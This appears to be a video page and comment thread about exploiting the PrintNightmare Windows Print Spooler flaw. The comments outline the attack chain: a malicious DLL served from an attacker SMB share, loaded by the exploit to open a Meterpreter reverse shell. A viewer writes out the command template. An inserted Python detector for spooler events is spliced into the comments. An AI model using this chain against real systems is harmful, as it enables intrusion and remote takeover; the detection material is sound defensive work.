Explaining and Exploiting PrintNightmare | CVE-2021-34527

  • Published 7 Aug 2021
  • Hello everyone,
    Hope you are doing great!
    In this video, I walk you through explaining and exploiting PrintNightmare. PrintNightmare (CVE-2021-34527) is a very serious vulnerability in the Windows Print Spooler service which leads to RCE (remote code execution) and LPE (local privilege escalation). I hope you enjoy the video! Make sure to leave a like and subscribe to the channel ;)
    Note: This video is just for educational purposes. Neither I nor my channel will be responsible for any malicious intent of yours.
    PrintNightmare Repo : github.com/cube0x0/CVE-2021-1675
    My Socials:
    Twitter: /bhalgamavedant
    GitHub: github.com/Vedant-Bhalgama
    Note:
    All videos and tutorials are for informational and educational purposes only. I believe that ethical hacking, information security, and cybersecurity should be familiar subjects to anyone using digital information and computers. It is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on this channel are only for those interested in learning about ethical hacking, security, and penetration testing. This channel is against the misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.
  • Science & Technology

COMMENTS • 48

  • @gowthamnaiduponnana7331 2 years ago +2

    Vulnerability that rocked the world, "PrintNightmare"... You did it great!!!

  • @LexiLominite 2 years ago +2

    Nice, buddy. You did great! 🤟

  • @applepine1048 4 months ago

    I still don't understand this. Does PrintNightmare only happen to shared printers (e.g. USB) but not to printers on a switch? Since PrintNightmare, all the patches we had installed didn't allow us to access our shared printer (connected to the main PC with USB). The main PC is connected to a big LAN. Now we bought a nice 8-port switch and connected lots of devices to it, and the best part now: every PC can access the printer perfectly.
    In the beginning, using the shared printer was only possible by downloading the driver from the main PC. Since the printer is connected to the switch, the driver has to be downloaded from the HP website.

  • @krisnapranavelangovan6453 2 years ago +1

    GREAT!!!!

  • @birkanwarsinghvirk5430 2 years ago

    Nice effort, dude. Keep going!

  • @SecurityTalent 2 years ago

    Great

  • @BCTAHbKA 1 year ago

    This is the best video ever

  • @chandrashekarb2546 1 year ago

    I have tried the same, but at the last stage what name, password and IP should be used? Because of this I am stuck here and unable to proceed further.

  • @caitlincrum9240 2 years ago

    Do you know how to use SMBv2 instead of v3 when setting up the server with Impacket? Thanks!

  • @ian230187 2 years ago

    Just a quick query... this exploit can be used to target normal workstations as well, and not necessarily domain controllers... it's just that the machine needs to be part of the domain... Am I right?

    • @ActiveXSploit 2 years ago +1

      Yes, you are right. This is an AD-based attack; the machine should be a part of the domain.

    • @ian230187 2 years ago

      @ActiveXSploit Thanks, man, and great job... One request... at the end of the video, if you could quickly add a slide about the steps and a one-liner explanation of the significance of each command, it would be super awesome.

    • @ActiveXSploit 2 years ago +1

      @ian230187 Glad you liked it! Alright! I'm gonna keep that in mind!

  • @theikeamafia1347 2 years ago +1

    Hello there, it's a great video and explains everything in great detail. I'm quite new to using Metasploit, or not really, I just can't wrap my head around it. So when I connect to the Windows machine, how do I actually navigate it? Can I just use normal Windows commands? So if I would, for example, want to just make a new file, would I just type "md %random%" into the msfconsole, for example, if I wanted to make a random empty file?

    • @ActiveXSploit 2 years ago +1

      You can switch to shell mode by typing the command 'shell' when you get a Meterpreter connection, and then you can just run standard Windows commands such as cd, mkdir, rmdir, and so on. But you can also do this in a Meterpreter session; just type 'help' to list the available commands in a Meterpreter session.

    • @theikeamafia1347 2 years ago

      @ActiveXSploit Alright, thank you very much! You've been so helpful and make great videos.

    • @ActiveXSploit 2 years ago

      @theikeamafia1347 Glad to hear that! There are good videos on the usage of Metasploit on UA-cam; just search them up and you should get some good resources!

    • @theikeamafia1347 2 years ago

      @ActiveXSploit Yes, thank you, I'll go see. I've checked out some videos before, but all I've really found is basics and how to create a reverse TCP shell. Otherwise it doesn't really go in depth about Metasploit. Found one which is very good though.

    • @theikeamafia1347 2 years ago

      @ActiveXSploit I just can't seem to get it to work. So at the end, to establish the connection, you do python3 ./CVE-2021-1675.py, then what is it I put here/username:"password"@ip address of target machine '\\my ip address\share\shell.dll'?
      Did I get all that correct? Except for my question on what to put before the username.

  • @ian230187 2 years ago

    Hey there...
    Was revising this...
    Hi there...
    Unable to figure out the need for this share drive that we set up on the Kali...
    We used msfvenom to create the payload...
    Metasploit for listening for the connection...
    Now our aim is to execute this payload on the remote workstation that has the Print Spooler service enabled...
    Why did we need the help of a share drive on our attacker workstation and use Impacket to make the victim execute that DLL file via the share hosted on our machine... if we had somehow managed to deliver that payload to the victim, I guess the share drive and Impacket step is not needed...
    Please enlighten me.

    • @ActiveXSploit 2 years ago +1

      We need the SMB share. So what we do is generate a malicious DLL using msfvenom, and then use the custom version of Impacket used in the video. We need smbserver.py as it is going to host our malicious DLL. The exploit will get the malicious DLL onto the system via the SMB share which we hosted. Once it is on the system, the DLL will be injected into memory, and all of this is happening due to the vulnerability: Print Spooler had an authentication bug in it, due to which anyone could install print drivers. As an attacker, we can take advantage of it and put a malicious DLL on the target system.

    • @ian230187 2 years ago

      @ActiveXSploit Thanks, man.
      So I understand this:
      - msfvenom: payload creation
      - Impacket smbshare: create a share on the local machine to host the malicious DLL.
      - Impacket CVE module: force the victim to execute the DLL, which becomes possible due to the auth bypass bug.
      - Metasploit: get a reverse shell once the DLL is executed.

    • @ActiveXSploit 2 years ago +1

      @ian230187 We are using Impacket to set up an SMB share. Impacket is the name of the collection of scripts; don't get confused by it. There is an Impacket script called smbserver which we used to set up an SMB share which is going to serve our malicious DLL. The one which delivers the DLL over there and executes it is the exploit.

    • @ian230187 2 years ago

      @ActiveXSploit Ohh ya, my typo...
      Impacket modules of smbshare and the CVE...
      Thanks
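The two threads above describe the full chain used in the video: a DLL hosted on an attacker SMB share, the spooler tricked into installing it as a printer driver, and the DLL then loaded by spoolsv.exe. The block below is an added example (not code from the video, the channel, or the cube0x0 repository) showing what that chain looks like from the defender's side: it triages Microsoft-Windows-PrintService/Operational events 316 (driver added or updated) and 808 (plug-in module failed to load) together with Sysmon event 11 (FileCreate) and escalates when a UNC-sourced driver add and a DLL drop under spool\drivers\x64\3 land on the same host within a short window. The dict field names, the host names, the 10.10.14.5 share address and every sample event are constructed for the example and are not from the page.

```python
"""Triage Windows print-spooler telemetry for PrintNightmare-style driver installs.

Added example, not code from the video or from the cube0x0 exploit repo.
Event IDs follow the public Microsoft-Windows-PrintService/Operational log
(316 driver added, 808 plug-in load failure) and Sysmon (11 FileCreate); the
dict field names and every sample event below are constructed for this demo.
"""
import re
from dataclasses import dataclass, field

# Directory the spooler unpacks x64 version-3 drivers into; the exploit's DLL
# is written here by spoolsv.exe and then loaded as a "plug-in".
SPOOL_DRIVER_DIR = re.compile(r"\\spool\\drivers\\x64\\3\\", re.IGNORECASE)
# \\host\share\file - the attacker-hosted SMB path passed to the exploit.
UNC_PATH = re.compile(r"^\\\\[^\\]+\\[^\\]+\\", re.IGNORECASE)
DLL = re.compile(r"\.dll$", re.IGNORECASE)
SEV = {"medium": 1, "high": 2, "critical": 3}


@dataclass
class Event:
    source: str            # "PrintService" or "Sysmon"
    event_id: int
    host: str
    ts: int                # epoch seconds (constructed)
    data: dict = field(default_factory=dict)


def classify(ev):
    """Findings for one event as (severity, reason) tuples; [] means nothing seen."""
    hits = []
    if ev.source == "PrintService" and ev.event_id == 316:
        # 316: "Printer driver X for Windows x64 Version-3 was added or updated.
        # Files:- ..." - a driver file served from a UNC path is the tell.
        for f in ev.data.get("files", []):
            if UNC_PATH.match(f):
                hits.append(("high", f"driver file from UNC path {f}"))
    elif ev.source == "PrintService" and ev.event_id == 808:
        # 808: "The print spooler failed to load a plug-in module <path>";
        # seen when the dropped DLL runs its payload and never returns cleanly.
        mod = ev.data.get("module", "")
        if SPOOL_DRIVER_DIR.search(mod):
            hits.append(("medium", f"plug-in load failure for {mod}"))
    elif ev.source == "Sysmon" and ev.event_id == 11:
        # 11: FileCreate. Legitimate driver installs also land here, so this is
        # medium on its own and only escalates when correlated in triage().
        target, image = ev.data.get("target", ""), ev.data.get("image", "")
        if (SPOOL_DRIVER_DIR.search(target) and DLL.search(target)
                and image.lower().endswith("spoolsv.exe")):
            hits.append(("medium", f"spoolsv.exe wrote {target}"))
    return hits


def triage(events, window=120):
    """Per-host report; a UNC-sourced driver add (316) plus a DLL drop (Sysmon 11)
    within `window` seconds on the same host is escalated to critical."""
    per_host = {}
    for ev in events:
        for sev, why in classify(ev):
            per_host.setdefault(ev.host, []).append((ev.ts, ev.event_id, sev, why))
    report = {}
    for host, hits in per_host.items():
        ids = {h[1] for h in hits}
        span = max(h[0] for h in hits) - min(h[0] for h in hits)
        if {316, 11} <= ids and span <= window:
            overall = "critical"
        else:
            overall = max((h[2] for h in hits), key=SEV.get)
        report[host] = {"severity": overall, "hits": sorted(hits)}
    return report


# Constructed sample telemetry: WS01 is hit from an attacker share at 10.10.14.5
# (hypothetical address); PRINT01 gets a normal local driver install.
SAMPLE_EVENTS = [
    Event("Sysmon", 11, "WS01", 1000, {"image": r"C:\Windows\System32\spoolsv.exe",
          "target": r"C:\Windows\System32\spool\drivers\x64\3\new\1\shell.dll"}),
    Event("PrintService", 316, "WS01", 1002, {"files": [
          r"C:\Windows\System32\spool\drivers\x64\3\UNIDRV.DLL",
          r"\\10.10.14.5\share\shell.dll"]}),
    Event("PrintService", 808, "WS01", 1003,
          {"module": r"C:\Windows\System32\spool\drivers\x64\3\old\1\shell.dll"}),
    Event("Sysmon", 11, "PRINT01", 5000, {"image": r"C:\Windows\System32\spoolsv.exe",
          "target": r"C:\Windows\System32\spool\drivers\x64\3\hpcpp.dll"}),
    Event("PrintService", 316, "PRINT01", 5001, {"files": [
          r"C:\Windows\System32\spool\drivers\x64\3\hpcpp.dll"]}),
]

if __name__ == "__main__":
    for host, rep in triage(SAMPLE_EVENTS).items():
        print(host, rep["severity"])
        for ts, eid, sev, why in rep["hits"]:
            print(f"  t={ts} id={eid} [{sev}] {why}")
```

Run as-is and WS01 comes out critical (UNC driver source, DLL drop and plug-in failure within three seconds) while PRINT01 stays at medium, because spoolsv.exe writing a DLL into the driver store is exactly what a legitimate driver install also does; the UNC path in event 316 is what separates the two, which is why the correlation, not the single Sysmon hit, drives the verdict.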

  • @anirudhdilli6250 2 years ago

    Noice

  • @nikschuetz4112 1 year ago

    Better to make a venv to have the custom Impacket.

  • @ayushsinha6214 2 years ago

    Nice video. Tried that but defender is a bitch.

    • @ActiveXSploit 2 years ago

      Haha, Defender is getting better every day!

  • @sarunkim6096 2 years ago

    Give me the link to the vulnerable Windows 2016, sir!

    • @ActiveXSploit 2 years ago

      Do check the description of the video, please.

    • @sarunkim6096 2 years ago

      Can you give me the link to how to download a vulnerable Windows 2016?

    • @ActiveXSploit 2 years ago

      @sarunkim6096 What do you mean? A vulnerable version of Windows Server 2016?

    • @sarunkim6096 2 years ago

      Yes, I want to test it.

    • @sarunkim6096 2 years ago

      @ActiveXSploit I have downloaded Windows 2016 from Microsoft, but it is not vulnerable.